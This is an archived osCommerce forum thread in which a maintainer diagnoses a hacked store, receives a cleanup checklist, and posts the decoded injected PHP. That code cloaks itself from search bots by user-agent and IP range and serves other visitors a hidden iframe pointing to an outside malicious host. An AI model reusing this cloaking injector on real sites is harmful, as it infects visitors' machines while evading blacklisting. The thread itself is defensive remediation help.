Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Might have been hacked, need help with Warning: session_start() message


vwnobby

Recommended Posts

Unfortunately I know very little about osCommerce and how it works. The site I'm "managing" was dumped onto my lap and I was mainly tasked with design upkeep. However, the customer contacted me and said that messages were appearing at the top of the site. This is what is showing:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/F/4/E/F4Everyone/html/index.php(1) : eval()'d code:37) in /home/content/F/4/E/F4Everyone/html/includes/functions/sessions.php on line 97

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/F/4/E/F4Everyone/html/index.php(1) : eval()'d code:37) in /home/content/F/4/E/F4Everyone/html/includes/functions/sessions.php on line 97

 

Warning: I am able to write to the configuration file: /home/content/F/4/E/F4Everyone/html/includes/configure.php. This is a potential security risk - please set the right user permissions on this file.

 

I've been searching online for several hours now and the only thing I've managed to find out is that the site may have been hacked.

Can anyone give me some direction to get rid of the messages for now, and how I can go about preventing it from happening once more?

Again, I am very unfamiliar with how osCommerece (and PHP mySQL as well) so I may require a lot of hand holding.

Any help would be greatly appreciated!!!

Thank you!

Link to comment
Share on other sites

Yes, you've been hacked. At the very top of your index.php you'll find some foreign code, probably containing an eval() call. Remove it, and that unfortunately is just the start of disinfecting your site. Also read up on beefing up your site's security, to reduce the chances of a hacker getting in again.

 

Both "configure.php" files are supposed to be read-only (444 permissions). How long have they been writable?

Link to comment
Share on other sites

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.

 

 

Chris

Link to comment
Share on other sites

Yes, you've been hacked. At the very top of your index.php you'll find some foreign code, probably containing an eval() call. Remove it, and that unfortunately is just the start of disinfecting your site. Also read up on beefing up your site's security, to reduce the chances of a hacker getting in again.

 

Both "configure.php" files are supposed to be read-only (444 permissions). How long have they been writable?

 

Thanks for the info MrPhil! I was able to remove the messages for now, but I do understand that it's probably only the beginning of the issues. As for how long we were writable, I honestly don't know. The client has not contacted me for work for almost a year. So I haven't touched the site for quite some time. However, I believe the messages only appeared recently, probably within the last few days.

Link to comment
Share on other sites

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.

 

Chris

 

 

Chris, thanks for the list!!! It'll give me somewhat of a road map to follow during this process.

I have questions on items 1 & 8.

Not really sure how .htaccess works. I did find a site that generates code for this file. ( http://www.oscommerce-solution.com/create_htpasswd.php )....

Is it as simple as adding a small block of code? I've seen several .htaccess files throughout the different file folders, do they all get modified? Once I added the password, is it just the admin directory that will require password or will it block users from the site? (and is this why you mentioned having to remove the .htaccess later on?)

 

Sorry for so many questions, just trying to get a grip on how this works.

 

Thanks again for the info!!!

Link to comment
Share on other sites

So I tried to do some cleaning up, but since I'm not that well versed, I guess I didn't do a good enough job. The same issue keeps coming up.

I had a friend "decode" the eval statement that showed up at the top of the index.php file and this is what he found:

 

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

array("216.239.32.0","216.239.63.255"),

array("64.68.80.0" ,"64.68.87.255" ),

array("66.102.0.0", "66.102.15.255"),

array("64.233.160.0","64.233.191.255"),

array("66.249.64.0", "66.249.95.255"),

array("72.14.192.0", "72.14.255.255"),

array("209.85.128.0","209.85.255.255"),

array("198.108.100.192","198.108.100.207"),

array("173.194.0.0","173.194.255.255"),

array("216.33.229.144","216.33.229.151"),

array("216.33.229.160","216.33.229.167"),

array("209.185.108.128","209.185.108.255"),

array("216.109.75.80","216.109.75.95"),

array("64.68.88.0","64.68.95.255"),

array("64.68.64.64","64.68.64.127"),

array("64.41.221.192","64.41.221.207"),

array("74.125.0.0","74.125.255.255"),

array("65.52.0.0","65.55.255.255"),

array("74.6.0.0","74.6.255.255"),

array("67.195.0.0","67.195.255.255"),

array("72.30.0.0","72.30.255.255"),

array("38.0.0.0","38.255.255.255")

);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="http://alzvcmr.co.tv/?go=1" width="1" height="1"></iframe>';

}

 

Anyone have any ideas what to do with this?

When looking through the code, is there any reason why base64 should be on any page? Or should I just remove any reference to base64?

Link to comment
Share on other sites

There are a couple of files contained in osCommerce and some contributions that contain the base64 decode function. However, there is NO encrypted code found in ANY file in osCommerce.

 

 

 

 

 

 

Chris

Link to comment
Share on other sites

So I tried to do some cleaning up, but since I'm not that well versed, I guess I didn't do a good enough job. The same issue keeps coming up.

I had a friend "decode" the eval statement that showed up at the top of the index.php file and this is what he found:

 

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

array("216.239.32.0","216.239.63.255"),

array("64.68.80.0" ,"64.68.87.255" ),

array("66.102.0.0", "66.102.15.255"),

array("64.233.160.0","64.233.191.255"),

array("66.249.64.0", "66.249.95.255"),

array("72.14.192.0", "72.14.255.255"),

array("209.85.128.0","209.85.255.255"),

array("198.108.100.192","198.108.100.207"),

array("173.194.0.0","173.194.255.255"),

array("216.33.229.144","216.33.229.151"),

array("216.33.229.160","216.33.229.167"),

array("209.185.108.128","209.185.108.255"),

array("216.109.75.80","216.109.75.95"),

array("64.68.88.0","64.68.95.255"),

array("64.68.64.64","64.68.64.127"),

array("64.41.221.192","64.41.221.207"),

array("74.125.0.0","74.125.255.255"),

array("65.52.0.0","65.55.255.255"),

array("74.6.0.0","74.6.255.255"),

array("67.195.0.0","67.195.255.255"),

array("72.30.0.0","72.30.255.255"),

array("38.0.0.0","38.255.255.255")

);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="http://alzvcmr.co.tv/?go=1" width="1" height="1"></iframe>';

}

 

Anyone have any ideas what to do with this?

When looking through the code, is there any reason why base64 should be on any page? Or should I just remove any reference to base64?

The code checks the IP address of whomever is viewing it against the IP addresses of some known BOTS.

 

If the viewer ISN'T one of the BOT's it "contaminates" the page.

 

This way they (the hackers) don't end up with "This site may harm your computer" message on search engine results of sites they infect.

 

This generally allows them to infect more machines.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...